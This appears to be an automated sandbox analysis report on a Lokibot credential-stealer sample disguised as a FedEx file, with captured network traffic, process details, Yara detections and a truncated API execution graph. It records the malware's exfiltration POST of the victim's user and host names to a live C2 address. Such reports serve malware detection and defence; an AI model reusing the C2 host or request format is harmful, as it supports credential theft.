                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:42.835977077 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:40 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:42.836977959 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                May 22, 2024 22:03:42.839385033 CEST448INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                May 22, 2024 22:03:42.841876030 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                May 22, 2024 22:03:42.841892004 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                May 22, 2024 22:03:42.841902018 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                May 22, 2024 22:03:42.846730947 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:42.849127054 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:03:42.849138975 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                May 22, 2024 22:03:42.851085901 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.74974845.61.137.215806192C:\Users\user\Desktop\FedEx_776282383902.exe
                TimestampBytes transferredDirectionData
                May 22, 2024 22:03:42.997267962 CEST244OUTPOST /index.php/t?id=090 HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: 45.61.137.215
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: A316C5D8
                Content-Length: 165
                Connection: close
                May 22, 2024 22:03:43.047991037 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                May 22, 2024 22:03:46.146816969 CEST1236INHTTP/1.0 404 Not Found
                Date: Wed, 22 May 2024 20:03:43 GMT
                Server: Apache/2.4.52 (Ubuntu)
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                Connection: close
                Content-Type: text/html; charset=UTF-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                May 22, 2024 22:03:46.147844076 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                May 22, 2024 22:03:46.150197029 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                May 22, 2024 22:03:46.150209904 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                May 22, 2024 22:03:46.152543068 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                May 22, 2024 22:03:46.152556896 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                May 22, 2024 22:03:46.152570963 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                May 22, 2024 22:03:46.157201052 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                May 22, 2024 22:03:46.159548044 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                May 22, 2024 22:03:46.159567118 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:16:01:36
                Start date:22/05/2024
                Path:C:\Users\user\Desktop\FedEx_776282383902.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\FedEx_776282383902.exe"
                Imagebase:0xc30000
                File size:539'656 bytes
                MD5 hash:D8754EAD54BC3CCD3BB50E726362AEF9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low
                Has exited:true

                Target ID:3
                Start time:16:01:37
                Start date:22/05/2024
                Path:C:\Users\user\Desktop\FedEx_776282383902.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\FedEx_776282383902.exe"
                Imagebase:0x630000
                File size:539'656 bytes
                MD5 hash:D8754EAD54BC3CCD3BB50E726362AEF9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:false

                Reset < >

                  Execution Graph

                  Execution Coverage:10.1%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:4.3%
                  Total number of Nodes:231
                  Total number of Limit Nodes:13
                  execution_graph 28004 1490f98 28005 1491123 28004->28005 28006 1490fbe 28004->28006 28006->28005 28009 1491218 PostMessageW 28006->28009 28011 1491210 28006->28011 28010 1491284 28009->28010 28010->28006 28012 1491218 PostMessageW 28011->28012 28013 1491284 28012->28013 28013->28006 28024 1493d68 FindCloseChangeNotification 28025 1493dcf 28024->28025 27908 12c4668 27909 12c4672 27908->27909 27913 12c4758 27908->27913 27918 12c3e28 27909->27918 27911 12c468d 27914 12c477d 27913->27914 27922 12c4868 27914->27922 27926 12c4858 27914->27926 27919 12c3e33 27918->27919 27934 12c5c50 27919->27934 27921 12c6faf 27921->27911 27924 12c488f 27922->27924 27923 12c496c 27923->27923 27924->27923 27930 12c44b0 27924->27930 27928 12c4868 27926->27928 27927 12c496c 27927->27927 27928->27927 27929 12c44b0 CreateActCtxA 27928->27929 27929->27927 27931 12c58f8 CreateActCtxA 27930->27931 27933 12c59bb 27931->27933 27935 12c5c5b 27934->27935 27938 12c5c70 27935->27938 27937 12c7065 27937->27921 27939 12c5c7b 27938->27939 27942 12c5ca0 27939->27942 27941 12c7142 27941->27937 27943 12c5cab 27942->27943 27946 12c5cd0 27943->27946 27945 12c7245 27945->27941 27947 12c5cdb 27946->27947 27949 12c854b 27947->27949 27952 12cabf8 27947->27952 27948 12c8589 27948->27945 27949->27948 27956 12ccce0 27949->27956 27961 12cac20 27952->27961 27965 12cac30 27952->27965 27953 12cac0e 27953->27949 27957 12ccd11 27956->27957 27958 12ccd35 27957->27958 27988 12ccea0 27957->27988 27992 12cce90 27957->27992 27958->27948 27962 12cac30 27961->27962 27968 12cad28 27962->27968 27963 12cac3f 27963->27953 27967 12cad28 2 API calls 27965->27967 27966 12cac3f 27966->27953 27967->27966 27969 12cad39 27968->27969 27970 12cad5c 27968->27970 27969->27970 27976 12cafb0 27969->27976 27980 12cafc0 27969->27980 27970->27963 27971 12cad54 27971->27970 27972 12caf60 GetModuleHandleW 27971->27972 27973 12caf8d 27972->27973 27973->27963 27977 12cafc0 27976->27977 27978 12caff9 27977->27978 27984 12ca0e8 27977->27984 27978->27971 27981 12cafd4 27980->27981 27982 12caff9 27981->27982 27983 12ca0e8 LoadLibraryExW 27981->27983 27982->27971 27983->27982 27985 12cb1a0 LoadLibraryExW 27984->27985 27987 12cb219 27985->27987 27987->27978 27990 12ccead 27988->27990 27989 12ccee7 27989->27958 27990->27989 27996 12cb700 27990->27996 27993 12ccea0 27992->27993 27994 12cb700 2 API calls 27993->27994 27995 12ccee7 27993->27995 27994->27995 27995->27958 27997 12cb70b 27996->27997 27999 12cdbf8 27997->27999 28000 12cd004 27997->28000 28001 12cd00f 28000->28001 28002 12c5cd0 2 API calls 28001->28002 28003 12cdc67 28002->28003 28003->27999 28014 12cd3b8 28015 12cd3fe GetCurrentProcess 28014->28015 28017 12cd450 GetCurrentThread 28015->28017 28020 12cd449 28015->28020 28018 12cd48d GetCurrentProcess 28017->28018 28019 12cd486 28017->28019 28021 12cd4c3 28018->28021 28019->28018 28020->28017 28022 12cd4eb GetCurrentThreadId 28021->28022 28023 12cd51c 28022->28023 28030 619e822 28032 619e6d7 28030->28032 28031 619e859 28032->28031 28037 619f039 28032->28037 28053 619f0a6 28032->28053 28070 619f048 28032->28070 28033 619e9e0 28038 619f048 28037->28038 28086 149052a 28038->28086 28090 14902b7 28038->28090 28094 14901d7 28038->28094 28099 1490ad5 28038->28099 28103 1490393 28038->28103 28108 1490571 28038->28108 28113 149031e 28038->28113 28118 1490006 28038->28118 28123 1490707 28038->28123 28128 1490040 28038->28128 28133 1490a81 28038->28133 28139 149036e 28038->28139 28144 149040d 28038->28144 28039 619f086 28039->28033 28054 619f0a9 28053->28054 28055 619f034 28053->28055 28054->28033 28057 149052a 2 API calls 28055->28057 28058 149040d 2 API calls 28055->28058 28059 149036e 2 API calls 28055->28059 28060 1490a81 2 API calls 28055->28060 28061 1490040 2 API calls 28055->28061 28062 1490707 2 API calls 28055->28062 28063 1490006 2 API calls 28055->28063 28064 149031e 2 API calls 28055->28064 28065 1490571 2 API calls 28055->28065 28066 1490393 2 API calls 28055->28066 28067 1490ad5 2 API calls 28055->28067 28068 14901d7 2 API calls 28055->28068 28069 14902b7 2 API calls 28055->28069 28056 619f086 28056->28033 